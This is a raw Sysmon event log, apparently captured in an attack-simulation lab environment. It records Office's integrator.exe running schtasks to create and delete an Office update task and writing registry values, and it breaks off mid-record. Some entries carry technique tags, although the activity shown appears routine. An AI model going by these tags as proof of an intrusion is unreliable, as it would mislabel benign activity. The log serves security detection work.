14:55:55.751{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.751{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.735{A7A01FEF-EB7B-607E-830B-00000000BB01}63206724C:\Windows\system32\conhost.exe{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-830B-00000000BB01}6320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.719{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9acd6|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e73a8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.728{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Create /tn "Microsoft\Office\Office Feature Updates" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates.xml"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 734700x800000000000000071825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.704{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.704{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.704{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.688{A7A01FEF-EB7B-607E-810B-00000000BB01}32446080C:\Windows\system32\conhost.exe{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-810B-00000000BB01}3244C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.673{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9ae91|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e6cd8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.676{A7A01FEF-EB7B-607E-800B-00000000BB01}2308C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Delete /F /tn "Microsoft\Office\Office Feature Updates"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 13241300x800000000000000071812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1183,IFEOSetValue2021-04-20 14:55:55.673{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sdxhelper.exe\MitigationOptionsQWORD (0x00000000-0x00000100) 13241300x800000000000000071811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKCR\CLSID\{02BCC737-B171-4746-94C9-0D8A0B2C0089}\InprocServer32\(Default)C:\Program Files\Microsoft Office\root\Office16\IEAWSDC.DLL 13241300x800000000000000071810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\CategoryMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSSOAP30.DLL 13241300x800000000000000071809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\EventMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSSOAP30.DLL 13241300x800000000000000071808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\CategoryCountDWORD (0x00000004) 13241300x800000000000000071807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MSSOAP\TypesSupportedDWORD (0x00000001) 13241300x800000000000000071806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Microsoft Office 16\TypesSupportedDWORD (0x00000007) 13241300x800000000000000071805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Microsoft Office 16\EventMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSORES.DLL;C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE 13241300x800000000000000071804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\Microsoft Office 16 Alerts\TypesSupportedDWORD (0x00000007) 13241300x800000000000000071803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\Microsoft Office 16 Alerts\EventMessageFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\OFFREL.DLL 13241300x800000000000000071802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\RetentionDWORD (0x00000000) 13241300x800000000000000071801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\PrimaryModuleOAlerts 13241300x800000000000000071800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\MaxSizeDWORD (0x00020000) 13241300x800000000000000071799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\DisplayNameIDDWORD (0x00000066) 13241300x800000000000000071798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:55.657{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exeHKLM\System\CurrentControlSet\Services\EventLog\OAlerts\DisplayNameFileC:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft 